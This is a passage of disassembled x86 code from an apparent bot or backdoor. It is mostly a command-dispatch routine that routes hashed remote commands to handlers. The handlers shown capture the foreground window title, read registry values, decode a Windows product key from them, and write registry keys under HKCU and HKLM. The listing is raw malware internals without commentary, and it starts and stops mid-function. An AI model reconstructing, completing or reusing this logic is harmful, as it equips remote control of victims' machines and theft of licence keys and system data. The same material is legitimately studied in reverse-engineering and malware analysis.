; sub_40A8AD+56�j
push [ebp+arg_0]
call sub_416B40 ; strlen
pop ecx
mov [ebp+var_28], eax
mov eax, [ebp+var_20]
mov [ebp+var_14], eax
jmp short loc_40A927
; ---------------------------------------------------------------------------
loc_40A920: ; CODE XREF: sub_40A8AD+116�j
mov eax, [ebp+var_14]
inc eax
mov [ebp+var_14], eax
loc_40A927: ; CODE XREF: sub_40A8AD+71�j
mov eax, [ebp+var_14]
cmp eax, [ebp+var_28]
jge loc_40A9C8
mov eax, [ebp+arg_0]
add eax, [ebp+var_14]
movsx eax, byte ptr [eax]
push eax
call sub_416DE4 ; tolower
pop ecx
mov [ebp+var_8], eax
cmp [ebp+var_8], 30h
jl short loc_40A95D
cmp [ebp+var_8], 39h
jg short loc_40A95D
mov eax, [ebp+var_8]
sub eax, 30h
mov [ebp+var_10], eax
jmp short loc_40A9A0
; ---------------------------------------------------------------------------
loc_40A95D: ; CODE XREF: sub_40A8AD+9D�j
; sub_40A8AD+A3�j
cmp [ebp+var_8], 61h
jl short loc_40A99C
cmp [ebp+var_8], 66h
jg short loc_40A99C
and [ebp+var_24], 0
jmp short loc_40A976
; ---------------------------------------------------------------------------
loc_40A96F: ; CODE XREF: sub_40A8AD:loc_40A998�j
mov eax, [ebp+var_24]
inc eax
mov [ebp+var_24], eax
loc_40A976: ; CODE XREF: sub_40A8AD+C0�j
mov eax, [ebp+var_24]
movsx eax, [ebp+eax+var_1C]
test eax, eax
jz short loc_40A99A
mov eax, [ebp+var_24]
movsx eax, [ebp+eax+var_1C]
cmp [ebp+var_8], eax
jnz short loc_40A998
mov eax, [ebp+var_24]
add eax, 0Ah
mov [ebp+var_10], eax
loc_40A998: ; CODE XREF: sub_40A8AD+E0�j
jmp short loc_40A96F
; ---------------------------------------------------------------------------
loc_40A99A: ; CODE XREF: sub_40A8AD+D3�j
jmp short loc_40A9A0
; ---------------------------------------------------------------------------
loc_40A99C: ; CODE XREF: sub_40A8AD+B4�j
; sub_40A8AD+BA�j
xor eax, eax
jmp short loc_40A9CB
; ---------------------------------------------------------------------------
loc_40A9A0: ; CODE XREF: sub_40A8AD+AE�j
; sub_40A8AD:loc_40A99A�j
mov eax, [ebp+var_28]
sub eax, [ebp+var_14]
dec eax
push eax
push 10h
call sub_40A86D
pop ecx
pop ecx
mov [ebp+var_4], eax
mov eax, [ebp+var_4]
imul eax, [ebp+var_10]
mov ecx, [ebp+var_C]
add ecx, eax
mov [ebp+var_C], ecx
jmp loc_40A920
; ---------------------------------------------------------------------------
loc_40A9C8: ; CODE XREF: sub_40A8AD+80�j
mov eax, [ebp+var_C]
loc_40A9CB: ; CODE XREF: sub_40A8AD+F1�j
pop edi
pop esi
leave
retn
sub_40A8AD endp
; =============== S U B R O U T I N E =======================================
; Attributes: bp-based frame
sub_40A9CF proc near ; CODE XREF: sub_40D871+C95�p
; sub_40D871+D9C�p
var_6424 = dword ptr -6424h
var_6420 = dword ptr -6420h
var_641C = dword ptr -641Ch
var_6418 = dword ptr -6418h
var_6414 = dword ptr -6414h
var_6410 = dword ptr -6410h
var_640C = dword ptr -640Ch
var_6408 = dword ptr -6408h
var_6404 = dword ptr -6404h
var_6400 = dword ptr -6400h
var_63FC = dword ptr -63FCh
var_63F8 = dword ptr -63F8h
var_63F4 = dword ptr -63F4h
var_63F0 = dword ptr -63F0h
var_63EC = dword ptr -63ECh
var_63E8 = dword ptr -63E8h
var_63E4 = dword ptr -63E4h
var_63E0 = dword ptr -63E0h
var_63DC = dword ptr -63DCh
var_63D8 = dword ptr -63D8h
var_63D4 = dword ptr -63D4h
var_63D0 = dword ptr -63D0h
var_63CC = dword ptr -63CCh
var_63C8 = dword ptr -63C8h
var_63C4 = dword ptr -63C4h
var_63C0 = dword ptr -63C0h
var_63BC = dword ptr -63BCh
var_63B8 = dword ptr -63B8h
var_63B4 = word ptr -63B4h
var_63B2 = word ptr -63B2h
var_63B0 = dword ptr -63B0h
var_63A4 = dword ptr -63A4h
var_63A0 = byte ptr -63A0h
var_639C = dword ptr -639Ch
var_6398 = byte ptr -6398h
var_6397 = byte ptr -6397h
var_6396 = byte ptr -6396h
var_6395 = byte ptr -6395h
var_6394 = byte ptr -6394h
var_6393 = byte ptr -6393h
var_6392 = byte ptr -6392h
var_6391 = byte ptr -6391h
var_6390 = byte ptr -6390h
var_638F = byte ptr -638Fh
var_638E = byte ptr -638Eh
var_638D = byte ptr -638Dh
var_638C = dword ptr -638Ch
var_6388 = byte ptr -6388h
var_5F84 = dword ptr -5F84h
var_5F80 = byte ptr -5F80h
var_5B7C = dword ptr -5B7Ch
var_5B78 = dword ptr -5B78h
var_5B74 = byte ptr -5B74h
var_5A70 = dword ptr -5A70h
var_5A6C = dword ptr -5A6Ch
var_5A68 = dword ptr -5A68h
var_5A64 = byte ptr -5A64h
var_1A64 = dword ptr -1A64h
var_1A60 = byte ptr -1A60h
var_A60 = dword ptr -0A60h
var_A5C = byte ptr -0A5Ch
var_A38 = byte ptr -0A38h
var_A30 = dword ptr -0A30h
var_A2C = dword ptr -0A2Ch
var_A28 = dword ptr -0A28h
var_A24 = dword ptr -0A24h
var_A20 = dword ptr -0A20h
var_A1C = dword ptr -0A1Ch
var_A18 = byte ptr -0A18h
var_9F8 = dword ptr -9F8h
var_9F4 = byte ptr -9F4h
var_9EF = byte ptr -9EFh
var_9EA = byte ptr -9EAh
var_9E5 = byte ptr -9E5h
var_9E0 = byte ptr -9E0h
var_9DB = byte ptr -9DBh
var_9D8 = byte ptr -9D8h
var_9A4 = byte ptr -9A4h
var_970 = byte ptr -970h
var_8DC = dword ptr -8DCh
var_8D8 = byte ptr -8D8h
var_8D3 = byte ptr -8D3h
var_8D2 = byte ptr -8D2h
var_8CD = byte ptr -8CDh
var_8CC = byte ptr -8CCh
var_8C7 = byte ptr -8C7h
var_8C6 = byte ptr -8C6h
var_8C1 = byte ptr -8C1h
var_8C0 = byte ptr -8C0h
var_8BB = byte ptr -8BBh
var_8B8 = byte ptr -8B8h
var_8A0 = byte ptr -8A0h
var_720 = dword ptr -720h
var_71C = dword ptr -71Ch
var_718 = byte ptr -718h
var_59B = byte ptr -59Bh
var_598 = byte ptr -598h
var_418 = dword ptr -418h
var_414 = byte ptr -414h
var_214 = byte ptr -214h
var_1F0 = byte ptr -1F0h
var_1CC = byte ptr -1CCh
var_1A8 = dword ptr -1A8h
var_1A4 = byte ptr -1A4h
var_183 = byte ptr -183h
var_83 = dword ptr -83h
var_7F = byte ptr -7Fh
var_19 = byte ptr -19h
var_B = byte ptr -0Bh
var_8 = byte ptr -8
var_5 = dword ptr -5
arg_0 = dword ptr 8
arg_8 = dword ptr 10h
arg_C = dword ptr 14h
arg_10 = dword ptr 18h
arg_14 = dword ptr 1Ch
arg_18 = dword ptr 20h
push ebp
mov ebp, esp
mov eax, 6424h
call sub_416BC0
push esi
push edi
mov eax, [ebp+arg_14]
push dword ptr [eax]
call sub_40ED38
pop ecx
mov [ebp+var_1A8], eax
push [ebp+arg_0]
lea eax, [ebp+var_1A4]
push eax
call sub_416B3A ; strcpy
pop ecx
pop ecx
push [ebp+arg_8]
lea eax, [ebp+var_183]
push eax
call sub_416B3A ; strcpy
pop ecx
pop ecx
mov eax, [ebp+arg_C]
mov [ebp+var_83], eax
push 7Ah
push [ebp+arg_10]
lea eax, [ebp+var_7F]
push eax
call sub_416B52 ; memcpy
add esp, 0Ch
mov [ebp+var_5], 1
mov eax, [ebp+var_1A8]
sub eax, dword_419F18
neg eax
sbb eax, eax
inc eax
test eax, eax
jz short loc_40AA59
lea eax, [ebp+var_1A4]
push eax
call sub_415AF0
pop ecx
jmp loc_40C912
; ---------------------------------------------------------------------------
loc_40AA59: ; CODE XREF: sub_40A9CF+76�j
mov eax, [ebp+var_1A8]
sub eax, dword_419F0C
neg eax
sbb eax, eax
inc eax
test eax, eax
jz short loc_40AACF
mov eax, [ebp+arg_14]
cmp dword ptr [eax+4], 0
jnz short loc_40AAAC
lea eax, [ebp+var_214]
push eax
lea eax, [ebp+var_1F0]
push eax
lea eax, [ebp+var_1CC]
push eax
call sub_40668F
add esp, 0Ch
lea eax, [ebp+var_1CC]
push eax
push offset dword_419F04
call sub_40D6CB
pop ecx
pop ecx
jmp loc_40C912
; ---------------------------------------------------------------------------
loc_40AAAC: ; CODE XREF: sub_40A9CF+A6�j
mov eax, [ebp+arg_14]
push dword ptr [eax+4]
call sub_40D7E5
pop ecx
mov eax, [ebp+arg_14]
push dword ptr [eax+4]
push offset dword_419F04
call sub_40D6CB
pop ecx
pop ecx
jmp loc_40C912
; ---------------------------------------------------------------------------
loc_40AACF: ; CODE XREF: sub_40A9CF+9D�j
mov eax, [ebp+var_1A8]
sub eax, dword_419EF8
neg eax
sbb eax, eax
inc eax
test eax, eax
jz short loc_40AB21
push 200h
lea eax, [ebp+var_414]
push eax
call dword_4171D8 ; GetForegroundWindow
push eax
call dword_4171E4 ; GetWindowTextA
test eax, eax
jle short loc_40AB1C
lea eax, [ebp+var_414]
push eax
push offset dword_419EDC
lea eax, [ebp+var_1A4]
push eax
call sub_40D53F
add esp, 0Ch
loc_40AB1C: ; CODE XREF: sub_40A9CF+130�j
jmp loc_40C912
; ---------------------------------------------------------------------------
loc_40AB21: ; CODE XREF: sub_40A9CF+113�j
mov eax, [ebp+var_1A8]
sub eax, dword_419ED0
neg eax
sbb eax, eax
inc eax
test eax, eax
jz short loc_40AB56
mov eax, [ebp+arg_14]
push dword ptr [eax+8]
mov eax, [ebp+arg_14]
push dword ptr [eax+4]
lea eax, [ebp+var_1A4]
push eax
call sub_4077DD
add esp, 0Ch
jmp loc_40C912
; ---------------------------------------------------------------------------
loc_40AB56: ; CODE XREF: sub_40A9CF+165�j
mov eax, [ebp+var_1A8]
sub eax, dword_419EC4
neg eax
sbb eax, eax
inc eax
test eax, eax
jz loc_40AC89
mov eax, [ebp+arg_18]
cmp dword ptr [eax+4], 0
jz loc_40AC84
push 180h
mov eax, [ebp+arg_18]
push dword ptr [eax+4]
lea eax, [ebp+var_598]
push eax
call sub_407A56
add esp, 0Ch
lea eax, [ebp+var_598]
push eax
call sub_416B40 ; strlen
pop ecx
mov [ebp+var_418], eax
cmp [ebp+var_418], 3
jle short loc_40ABFE
push offset dword_419EC0
mov eax, [ebp+var_418]
lea eax, [ebp+eax+var_59B]
push eax
call sub_416DDE ; strcmp
pop ecx
pop ecx
test eax, eax
jnz short loc_40ABFE
mov eax, [ebp+var_418]
and [ebp+eax+var_59B], 0
lea eax, [ebp+var_598]
push eax
call sub_4078A0
pop ecx
lea eax, [ebp+var_598]
push eax
call sub_416B40 ; strlen
pop ecx
mov [ebp+var_418], eax
loc_40ABFE: ; CODE XREF: sub_40A9CF+1E1�j
; sub_40A9CF+1FF�j
mov eax, [ebp+var_418]
cdq
push 4
pop ecx
idiv ecx
mov ecx, [ebp+var_418]
sub ecx, eax
cmp ecx, 180h
jbe short loc_40AC1F
jmp loc_40C912
; ---------------------------------------------------------------------------
loc_40AC1F: ; CODE XREF: sub_40A9CF+249�j
push [ebp+var_418]
lea eax, [ebp+var_598]
push eax
call sub_40EF29
pop ecx
pop ecx
push [ebp+var_418]
lea eax, [ebp+var_598]
push eax
call sub_40EF59
pop ecx
pop ecx
mov [ebp+var_418], eax
push [ebp+var_418]
lea eax, [ebp+var_718]
push eax
lea eax, [ebp+var_598]
push eax
call sub_40EB4E
add esp, 0Ch
lea eax, [ebp+var_718]
push eax
push offset dword_419E9C
lea eax, [ebp+var_1A4]
push eax
call sub_40D53F
add esp, 0Ch
loc_40AC84: ; CODE XREF: sub_40A9CF+1A7�j
jmp loc_40C912
; ---------------------------------------------------------------------------
loc_40AC89: ; CODE XREF: sub_40A9CF+19A�j
mov eax, [ebp+var_1A8]
sub eax, dword_419E90
neg eax
sbb eax, eax
inc eax
test eax, eax
jz loc_40AD84
mov eax, [ebp+arg_18]
cmp dword ptr [eax+4], 0
jz loc_40AD7F
mov eax, [ebp+arg_18]
mov eax, [eax+4]
movsx eax, byte ptr [eax]
cmp eax, 3Dh
jnz loc_40AD7F
mov eax, [ebp+arg_18]
mov eax, [eax+4]
inc eax
push eax
call sub_40EC96
pop ecx
test eax, eax
jz loc_40AD7F
mov eax, [ebp+arg_18]
mov eax, [eax+4]
inc eax
push eax
call sub_416B40 ; strlen
pop ecx
mov [ebp+var_71C], eax
mov eax, [ebp+var_71C]
cdq
push 4
pop ecx
idiv ecx
mov ecx, [ebp+var_71C]
sub ecx, eax
cmp ecx, 180h
jbe short loc_40AD0C
jmp loc_40C912
; ---------------------------------------------------------------------------
loc_40AD0C: ; CODE XREF: sub_40A9CF+336�j
lea eax, [ebp+var_8A0]
push eax
mov eax, [ebp+arg_18]
mov eax, [eax+4]
inc eax
push eax
call sub_40E9C9
pop ecx
pop ecx
mov [ebp+var_720], eax
push [ebp+var_720]
lea eax, [ebp+var_8A0]
push eax
call sub_40F040
pop ecx
pop ecx
mov [ebp+var_720], eax
push [ebp+var_720]
lea eax, [ebp+var_8A0]
push eax
call sub_40EF41
pop ecx
pop ecx
mov eax, [ebp+var_720]
and [ebp+eax+var_8A0], 0
lea eax, [ebp+var_8A0]
push eax
push offset dword_419E70
lea eax, [ebp+var_1A4]
push eax
call sub_40D53F
add esp, 0Ch
loc_40AD7F: ; CODE XREF: sub_40A9CF+2DA�j
; sub_40A9CF+2EC�j ...
jmp loc_40C912
; ---------------------------------------------------------------------------
loc_40AD84: ; CODE XREF: sub_40A9CF+2CD�j
mov eax, [ebp+var_1A8]
sub eax, dword_419E60
neg eax
sbb eax, eax
inc eax
test eax, eax
jz short loc_40ADB2
mov eax, [ebp+arg_14]
push dword ptr [eax+4]
lea eax, [ebp+var_1A4]
push eax
call sub_406643
pop ecx
pop ecx
jmp loc_40C912
; ---------------------------------------------------------------------------
loc_40ADB2: ; CODE XREF: sub_40A9CF+3C8�j
mov eax, [ebp+var_1A8]
sub eax, dword_419E50
neg eax
sbb eax, eax
inc eax
test eax, eax
jz short loc_40ADD9
lea eax, [ebp+var_1A4]
push eax
call sub_4064BF
pop ecx
jmp loc_40C912
; ---------------------------------------------------------------------------
loc_40ADD9: ; CODE XREF: sub_40A9CF+3F6�j
mov eax, [ebp+var_1A8]
sub eax, dword_419E48
neg eax
sbb eax, eax
inc eax
test eax, eax
jz loc_40B0B6
and [ebp+var_9F8], 0
mov [ebp+var_A1C], 0C8h
push 0Ch
pop ecx
mov esi, offset dword_419E14
lea edi, [ebp+var_9D8]
rep movsd
movsb
push 5
pop ecx
mov esi, offset dword_419DFC
lea edi, [ebp+var_8B8]
rep movsd
movsb
lea eax, [ebp+var_9D8]
push eax
call sub_4105FB
pop ecx
lea eax, [ebp+var_9F8]
push eax
push 20019h
push 0
lea eax, [ebp+var_9D8]
push eax
push 80000002h
call dword_417008 ; RegOpenKeyExA
test eax, eax
jz short loc_40AE7D
lea eax, [ebp+var_9D8]
push eax
call sub_4105AD
pop ecx
cmp [ebp+var_9F8], 0
jz short loc_40AE78
push [ebp+var_9F8]
call dword_417028 ; RegCloseKey
loc_40AE78: ; CODE XREF: sub_40A9CF+49B�j
jmp loc_40C912
; ---------------------------------------------------------------------------
loc_40AE7D: ; CODE XREF: sub_40A9CF+485�j
lea eax, [ebp+var_9D8]
push eax
call sub_4105AD
pop ecx
lea eax, [ebp+var_8B8]
push eax
call sub_4105FB
pop ecx
lea eax, [ebp+var_A1C]
push eax
lea eax, [ebp+var_9A4]
push eax
push 0
push 0
lea eax, [ebp+var_8B8]
push eax
push [ebp+var_9F8]
call dword_41700C ; RegQueryValueExA
test eax, eax
jz short loc_40AEE7
lea eax, [ebp+var_8B8]
push eax
call sub_4105AD
pop ecx
cmp [ebp+var_9F8], 0
jz short loc_40AEE2
push [ebp+var_9F8]
call dword_417028 ; RegCloseKey
loc_40AEE2: ; CODE XREF: sub_40A9CF+505�j
jmp loc_40C912
; ---------------------------------------------------------------------------
loc_40AEE7: ; CODE XREF: sub_40A9CF+4EF�j
lea eax, [ebp+var_8B8]
push eax
call sub_4105AD
pop ecx
push [ebp+var_9F8]
call dword_417028 ; RegCloseKey
push 7
pop ecx
mov esi, offset dword_419DDC
lea edi, [ebp+var_A18]
rep movsd
movsb
lea eax, [ebp+var_A18]
push eax
call sub_4105FB
pop ecx
and [ebp+var_9DB], 0
mov [ebp+var_8DC], 18h
jmp short loc_40AF3E
; ---------------------------------------------------------------------------
loc_40AF31: ; CODE XREF: sub_40A9CF+60B�j
mov eax, [ebp+var_8DC]
dec eax
mov [ebp+var_8DC], eax
loc_40AF3E: ; CODE XREF: sub_40A9CF+560�j
cmp [ebp+var_8DC], 0
jl loc_40AFDF
and [ebp+var_A20], 0
mov [ebp+var_A24], 0Eh
jmp short loc_40AF6B
; ---------------------------------------------------------------------------
loc_40AF5E: ; CODE XREF: sub_40A9CF+5EF�j
mov eax, [ebp+var_A24]
dec eax
mov [ebp+var_A24], eax
loc_40AF6B: ; CODE XREF: sub_40A9CF+58D�j
cmp [ebp+var_A24], 0
jl short loc_40AFC0
mov eax, [ebp+var_A20]
shl eax, 8
mov ecx, [ebp+var_A24]
movzx ecx, [ebp+ecx+var_970]
add eax, ecx
mov [ebp+var_A20], eax
mov eax, [ebp+var_A20]
cdq
push 18h
pop ecx
idiv ecx
mov ecx, [ebp+var_A24]
mov [ebp+ecx+var_970], al
mov eax, [ebp+var_A20]
cdq
push 18h
pop ecx
idiv ecx
mov [ebp+var_A20], edx
jmp short loc_40AF5E
; ---------------------------------------------------------------------------
loc_40AFC0: ; CODE XREF: sub_40A9CF+5A3�j
mov eax, [ebp+var_8DC]
mov ecx, [ebp+var_A20]
mov cl, [ebp+ecx+var_A18]
mov [ebp+eax+var_9F4], cl
jmp loc_40AF31
; ---------------------------------------------------------------------------
loc_40AFDF: ; CODE XREF: sub_40A9CF+576�j
lea eax, [ebp+var_A18]
push eax
call sub_4105AD
pop ecx
and [ebp+var_8BB], 0
mov [ebp+var_8C1], 2Dh
mov al, [ebp+var_8C1]
mov [ebp+var_8C7], al
mov al, [ebp+var_8C7]
mov [ebp+var_8CD], al
mov al, [ebp+var_8CD]
mov [ebp+var_8D3], al
push 5
lea eax, [ebp+var_9F4]
push eax
lea eax, [ebp+var_8D8]
push eax
call sub_416B52 ; memcpy
add esp, 0Ch
push 5
lea eax, [ebp+var_9EF]
push eax
lea eax, [ebp+var_8D2]
push eax
call sub_416B52 ; memcpy
add esp, 0Ch
push 5
lea eax, [ebp+var_9EA]
push eax
lea eax, [ebp+var_8CC]
push eax
call sub_416B52 ; memcpy
add esp, 0Ch
push 5
lea eax, [ebp+var_9E5]
push eax
lea eax, [ebp+var_8C6]
push eax
call sub_416B52 ; memcpy
add esp, 0Ch
push 5
lea eax, [ebp+var_9E0]
push eax
lea eax, [ebp+var_8C0]
push eax
call sub_416B52 ; memcpy
add esp, 0Ch
lea eax, [ebp+var_8D8]
push eax
push offset dword_418B64
lea eax, [ebp+var_1A4]
push eax
call sub_40D53F
add esp, 0Ch
jmp loc_40C912
; ---------------------------------------------------------------------------
loc_40B0B6: ; CODE XREF: sub_40A9CF+41D�j
mov eax, [ebp+var_1A8]
sub eax, dword_419DCC
neg eax
sbb eax, eax
inc eax
test eax, eax
jz short loc_40B11C
mov [ebp+var_8], 1
movsx eax, [ebp+var_19]
test eax, eax
jz short loc_40B0E6
lea eax, [ebp+var_1A4]
push eax
call sub_411D68
pop ecx
jmp short loc_40B117
; ---------------------------------------------------------------------------
loc_40B0E6: ; CODE XREF: sub_40A9CF+706�j
movsx eax, [ebp+var_B]
test eax, eax
jz short loc_40B0FD
lea eax, [ebp+var_1A4]
push eax
call sub_4123F6
pop ecx
jmp short loc_40B117
; ---------------------------------------------------------------------------
loc_40B0FD: ; CODE XREF: sub_40A9CF+71D�j
lea eax, [ebp+var_1A4]
push eax
call sub_411D68
pop ecx
lea eax, [ebp+var_1A4]
push eax
call sub_4123F6
pop ecx
loc_40B117: ; CODE XREF: sub_40A9CF+715�j
; sub_40A9CF+72C�j
jmp loc_40C912
; ---------------------------------------------------------------------------
loc_40B11C: ; CODE XREF: sub_40A9CF+6FA�j
mov eax, [ebp+var_1A8]
sub eax, dword_419DBC
neg eax
sbb eax, eax
inc eax
test eax, eax
jz short loc_40B143
lea eax, [ebp+var_1A4]
push eax
call sub_414EB0
pop ecx
jmp loc_40C912
; ---------------------------------------------------------------------------
loc_40B143: ; CODE XREF: sub_40A9CF+760�j
mov eax, [ebp+var_1A8]
sub eax, dword_419DB0
neg eax
sbb eax, eax
inc eax
test eax, eax
jz loc_40B247
push 8
pop ecx
mov esi, offset dword_419D8C
lea edi, [ebp+var_A5C]
rep movsd
movsb
mov esi, offset dword_419D84
lea edi, [ebp+var_A38]
movsd
movsw
movsx eax, [ebp+var_A38]
mov ecx, off_41DA68
movsx ecx, byte ptr [ecx]
sub eax, ecx
neg eax
sbb eax, eax
inc eax
mov [ebp+var_A30], eax
cmp [ebp+var_A30], 0
jz short loc_40B1AD
mov [ebp+var_63E4], offset dword_419D78
jmp short loc_40B1B7
; ---------------------------------------------------------------------------
loc_40B1AD: ; CODE XREF: sub_40A9CF+7D0�j
mov [ebp+var_63E4], offset dword_419D68
loc_40B1B7: ; CODE XREF: sub_40A9CF+7DC�j
mov eax, [ebp+var_63E4]
mov [ebp+var_A28], eax
cmp [ebp+var_A30], 0
jz short loc_40B1D8
mov [ebp+var_63E8], offset aThisBuildIsFul ; "This build is fully functional"
jmp short loc_40B1E2
; ---------------------------------------------------------------------------
loc_40B1D8: ; CODE XREF: sub_40A9CF+7FB�j
mov [ebp+var_63E8], offset aThisBuildIsBro ; "This build is broken and will not funct"...
loc_40B1E2: ; CODE XREF: sub_40A9CF+807�j
mov eax, [ebp+var_63E8]
mov [ebp+var_A2C], eax
lea eax, [ebp+var_A5C]
push eax
call sub_4105FB
pop ecx
push [ebp+var_A2C]
push [ebp+var_A28]
mov eax, dword_41EC30
and eax, 0FFFFh
push eax
movsx eax, byte ptr dword_41DA48
and eax, 0FFh
push eax
lea eax, [ebp+var_A5C]
push eax
lea eax, [ebp+var_1A4]
push eax
call sub_40D53F
add esp, 18h
lea eax, [ebp+var_A5C]
push eax
call sub_4105AD
pop ecx
jmp loc_40C912
; ---------------------------------------------------------------------------
loc_40B247: ; CODE XREF: sub_40A9CF+787�j
mov eax, [ebp+var_1A8]
sub eax, dword_419D08
neg eax
sbb eax, eax
inc eax
test eax, eax
jz short loc_40B28E
mov eax, [ebp+arg_14]
push dword ptr [eax+14h]
mov eax, [ebp+arg_14]
push dword ptr [eax+10h]
mov eax, [ebp+arg_14]
push dword ptr [eax+0Ch]
mov eax, [ebp+arg_14]
push dword ptr [eax+8]
mov eax, [ebp+arg_14]
push dword ptr [eax+4]
lea eax, [ebp+var_1A4]
push eax
call sub_405E45
add esp, 18h
jmp loc_40C912
; ---------------------------------------------------------------------------
loc_40B28E: ; CODE XREF: sub_40A9CF+88B�j
mov eax, [ebp+var_1A8]
sub eax, dword_419CFC
neg eax
sbb eax, eax
inc eax
test eax, eax
jz short loc_40B2C5
mov eax, [ebp+arg_18]
add eax, 4
push eax
mov eax, [ebp+arg_14]
add eax, 4
push eax
lea eax, [ebp+var_1A4]
push eax
call sub_4167DD
add esp, 0Ch
jmp loc_40C912
; ---------------------------------------------------------------------------
loc_40B2C5: ; CODE XREF: sub_40A9CF+8D2�j
mov eax, [ebp+var_1A8]
sub eax, dword_419CF0
neg eax
sbb eax, eax
inc eax
test eax, eax
jnz short loc_40B2EF
mov eax, [ebp+var_1A8]
sub eax, dword_419CE4
neg eax
sbb eax, eax
inc eax
test eax, eax
jz short loc_40B300
loc_40B2EF: ; CODE XREF: sub_40A9CF+909�j
mov eax, [ebp+arg_18]
push dword ptr [eax+4]
call sub_40D74D
pop ecx
jmp loc_40C912
; ---------------------------------------------------------------------------
loc_40B300: ; CODE XREF: sub_40A9CF+91E�j
mov eax, [ebp+var_1A8]
sub eax, dword_419CD4
neg eax
sbb eax, eax
inc eax
test eax, eax
jz short loc_40B335
mov eax, [ebp+arg_14]
push dword ptr [eax+8]
mov eax, [ebp+arg_14]
push dword ptr [eax+4]
lea eax, [ebp+var_1A4]
push eax
call sub_403260
add esp, 0Ch
jmp loc_40C912
; ---------------------------------------------------------------------------
loc_40B335: ; CODE XREF: sub_40A9CF+944�j
mov eax, [ebp+var_1A8]
sub eax, dword_419CC8
neg eax
sbb eax, eax
inc eax
test eax, eax
jz short loc_40B36A
mov eax, [ebp+arg_18]
push dword ptr [eax+8]
mov eax, [ebp+arg_14]
push dword ptr [eax+4]
lea eax, [ebp+var_1A4]
push eax
call sub_40260D
add esp, 0Ch
jmp loc_40C912
; ---------------------------------------------------------------------------
loc_40B36A: ; CODE XREF: sub_40A9CF+979�j
mov eax, [ebp+var_1A8]
sub eax, dword_419CB8
neg eax
sbb eax, eax
inc eax
test eax, eax
jz short loc_40B3A5
mov eax, [ebp+arg_14]
push dword ptr [eax+0Ch]
mov eax, [ebp+arg_14]
push dword ptr [eax+8]
mov eax, [ebp+arg_14]
push dword ptr [eax+4]
lea eax, [ebp+var_1A4]
push eax
call sub_406509
add esp, 10h
jmp loc_40C912
; ---------------------------------------------------------------------------
loc_40B3A5: ; CODE XREF: sub_40A9CF+9AE�j
mov eax, [ebp+var_1A8]
sub eax, dword_419CA8
neg eax
sbb eax, eax
inc eax
test eax, eax
jz short loc_40B3DA
mov eax, [ebp+arg_18]
push dword ptr [eax+8]
mov eax, [ebp+arg_14]
push dword ptr [eax+4]
lea eax, [ebp+var_1A4]
push eax
call sub_41665C
add esp, 0Ch
jmp loc_40C912
; ---------------------------------------------------------------------------
loc_40B3DA: ; CODE XREF: sub_40A9CF+9E9�j
mov eax, [ebp+var_1A8]
sub eax, dword_419C98
neg eax
sbb eax, eax
inc eax
test eax, eax
jz short loc_40B426
mov eax, [ebp+arg_18]
cmp dword ptr [eax+4], 0
jnz short loc_40B3FD
jmp loc_40C912
; ---------------------------------------------------------------------------
loc_40B3FD: ; CODE XREF: sub_40A9CF+A27�j
mov eax, [ebp+arg_18]
push dword ptr [eax+4]
push 80000001h
call sub_401000
pop ecx
pop ecx
mov eax, [ebp+arg_18]
push dword ptr [eax+4]
push 80000002h
call sub_401000
pop ecx
pop ecx
jmp loc_40C912
; ---------------------------------------------------------------------------
loc_40B426: ; CODE XREF: sub_40A9CF+A1E�j
mov eax, [ebp+var_1A8]
sub eax, dword_419C88
neg eax
sbb eax, eax
inc eax
test eax, eax
jz short loc_40B44C
mov eax, [ebp+arg_18]
push dword ptr [eax+4]
call sub_401146
pop ecx
jmp loc_40C912
; ---------------------------------------------------------------------------
loc_40B44C: ; CODE XREF: sub_40A9CF+A6A�j
mov eax, [ebp+var_1A8]
sub eax, dword_419C7C
neg eax
sbb eax, eax
inc eax
test eax, eax
jz short loc_40B47D
push 0
mov eax, [ebp+arg_18]
push dword ptr [eax+4]
lea eax, [ebp+var_1A4]
push eax
call sub_4017AA
add esp, 0Ch
jmp loc_40C912
; ---------------------------------------------------------------------------
loc_40B47D: ; CODE XREF: sub_40A9CF+A90�j
mov eax, [ebp+var_1A8]
sub eax, dword_419C70
neg eax
sbb eax, eax
inc eax
test eax, eax
jz short loc_40B4AE
push 1
mov eax, [ebp+arg_18]
push dword ptr [eax+4]
lea eax, [ebp+var_1A4]
push eax
call sub_4017AA
add esp, 0Ch
jmp loc_40C912
; ---------------------------------------------------------------------------
loc_40B4AE: ; CODE XREF: sub_40A9CF+AC1�j
mov eax, [ebp+var_1A8]
sub eax, dword_419C64
neg eax
sbb eax, eax
inc eax
test eax, eax
jz short loc_40B4D5
lea eax, [ebp+var_1A4]
push eax
call sub_409BF1
pop ecx
jmp loc_40C912
; ---------------------------------------------------------------------------
loc_40B4D5: ; CODE XREF: sub_40A9CF+AF2�j
mov eax, [ebp+var_1A8]
sub eax, dword_419C5C
neg eax
sbb eax, eax
inc eax
test eax, eax
jz short loc_40B508
push offset dword_41EF48
push offset dword_419C4C
lea eax, [ebp+var_1A4]
push eax
call sub_40D53F
add esp, 0Ch
jmp loc_40C912
; ---------------------------------------------------------------------------
loc_40B508: ; CODE XREF: sub_40A9CF+B19�j
mov eax, [ebp+var_1A8]
sub eax, dword_419C40
neg eax
sbb eax, eax
inc eax
test eax, eax
jz short loc_40B536
mov eax, [ebp+arg_18]
push dword ptr [eax+4]
lea eax, [ebp+var_1A4]
push eax
call sub_413FE7
pop ecx
pop ecx
jmp loc_40C912
; ---------------------------------------------------------------------------
loc_40B536: ; CODE XREF: sub_40A9CF+B4C�j
mov eax, [ebp+var_1A8]
sub eax, dword_419C34
neg eax
sbb eax, eax
inc eax
test eax, eax
jnz short loc_40B575
mov eax, [ebp+var_1A8]
sub eax, dword_419C28
neg eax
sbb eax, eax
inc eax
test eax, eax
jnz short loc_40B575
mov eax, [ebp+var_1A8]
sub eax, dword_419C1C
neg eax
sbb eax, eax
inc eax
test eax, eax
jz short loc_40B5A7
loc_40B575: ; CODE XREF: sub_40A9CF+B7A�j
; sub_40A9CF+B8F�j
mov eax, [ebp+arg_14]
push dword ptr [eax+14h]
mov eax, [ebp+arg_14]
push dword ptr [eax+10h]
mov eax, [ebp+arg_14]
push dword ptr [eax+0Ch]
mov eax, [ebp+arg_14]
push dword ptr [eax+8]
mov eax, [ebp+arg_14]
push dword ptr [eax+4]
lea eax, [ebp+var_1A4]
push eax
call sub_413AB0
add esp, 18h
jmp loc_40C912
; ---------------------------------------------------------------------------
loc_40B5A7: ; CODE XREF: sub_40A9CF+BA4�j
mov eax, [ebp+var_1A8]
sub eax, dword_419C0C
neg eax
sbb eax, eax
inc eax
test eax, eax
jz short loc_40B5CE
lea eax, [ebp+var_1A4]
push eax
call sub_41417D
